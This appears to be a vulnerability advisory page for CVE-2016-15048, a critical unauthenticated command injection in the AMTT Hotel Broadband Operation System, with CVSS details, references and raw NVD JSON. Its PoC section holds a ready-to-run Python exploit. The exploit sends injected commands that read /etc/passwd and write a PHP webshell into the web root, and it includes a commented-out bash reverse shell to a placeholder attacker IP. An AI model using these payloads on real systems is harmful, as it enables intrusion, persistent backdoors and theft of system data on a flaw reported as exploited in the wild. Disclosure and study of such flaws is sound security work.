CVE-2016-15048

Description

AMTT Hotel Broadband Operation System (HiBOS) contains an unauthenticated command injection vulnerability in the /manager/radius/server_ping.php endpoint. The application constructs a shell command that includes the user-supplied ip parameter and executes it without proper validation or escaping. An attacker can insert shell metacharacters into the ip parameter to inject and execute arbitrary system commands as the web server user. The initial third-party disclosure in 2016 recommended contacting the vendor for remediation guidance. Additionally, this product may have been rebranded under a different name. VulnCheck has observed this vulnerability being exploited in the wild as of 2025-10-14 at 04:45:53.510819 UTC.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:amttgroup:hibos:-:*:*:*:*:*:*:* - VULNERABLE

AMTT Hotel Broadband Operation System (HiBOS) 所有未修补版本

产品可能已更名为其他品牌名称

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2016-15048 - AMTT HiBOS Command Injection PoC
# Vulnerability: Unauthenticated Command Injection in /manager/radius/server_ping.php
# Parameter: ip (unsanitized, directly concatenated into shell command)

import requests

TARGET_URL = "http://target-host/manager/radius/server_ping.php"

# Payload: inject shell command via ip parameter using semicolon (;)
# The original command likely constructs something like: ping -c 4 <user_input>
# By injecting "; <command>", we break out of the original command
payloads = [
    # Basic command execution - read /etc/passwd
    {"ip": "127.0.0.1; cat /etc/passwd"},
    # Reverse shell example (adjust IP and port)
    # {"ip": "127.0.0.1; bash -i >& /dev/tcp/attacker_ip/4444 0>&1"},
    # Write a webshell for persistent access
    {"ip": "127.0.0.1; echo '<?php system($_GET["cmd"]);?>' > /var/www/html/shell.php"},
    # Using pipe (|) as alternative injection vector
    {"ip": "127.0.0.1 | id"},
    # Using backticks for command substitution
    {"ip": "127.0.0.1 `id`"},
    # Using $(command) syntax
    {"ip": "127.0.0.1 $(id)"},
]

for payload in payloads:
    try:
        response = requests.post(TARGET_URL, data=payload, timeout=10)
        print(f"[*] Payload: {payload['ip']}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response:\n{response.text[:2000]}")
        print("-" * 60)
    except Exception as e:
        print(f"[!] Error: {e}")

# Nuclei template reference:
# https://github.com/adysec/nuclei_poc/blob/main/poc/remote_code_execution/hiboss-rce_2.yaml

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-15048
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-15048
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-15048/
[4] VulDB https://vuldb.com/cve/CVE-2016-15048
[5] https://github.com/adysec/nuclei_poc/blob/49c283b2bbb244c071786a2b768fbdde1b91f38e/poc/remote_code_execution/hiboss-rce_2.yaml#L21
[6] https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444
[7] https://www.amttgroup.com/
[8] https://www.cnvd.org.cn/flaw/show/CNVD-2021-37784
[9] https://www.vulncheck.com/advisories/amtt-hibos-command-injection-rce-via-server-ping-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-15048", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:30.923", "lastModified": "2025-12-31T13:12:22.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AMTT Hotel Broadband Operation System (HiBOS) contains an unauthenticated command injection vulnerability in the /manager/radius/server_ping.php endpoint. The application constructs a shell command that includes the user-supplied ip parameter and executes it without proper validation or escaping. An attacker can insert shell metacharacters into the ip parameter to inject and execute arbitrary system commands as the web server user. The initial third-party disclosure in 2016 recommended contacting the vendor for remediation guidance. Additionally, this product may have been rebranded under a different name. VulnCheck has observed this vulnerability being exploited in the wild as of 2025-10-14 at 04:45:53.510819 UTC."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amttgroup:hibos:-:*:*:*:*:*:*:*", "matchCriteriaId": "69986AC9-4727-4E39-A9E3-4AF8B04C8AB0"}]}]}], "references": [{"url": "https://github.com/adysec/nuclei_poc/blob/49c283b2bbb244c071786a2b768fbdde1b91f38e/poc/remote_code_execution/hiboss-rce_2.yaml#L21", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.amttgroup.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-37784", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.vulncheck.com/advisories/amtt-hibos-command-injection-rce-via-server-ping-php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}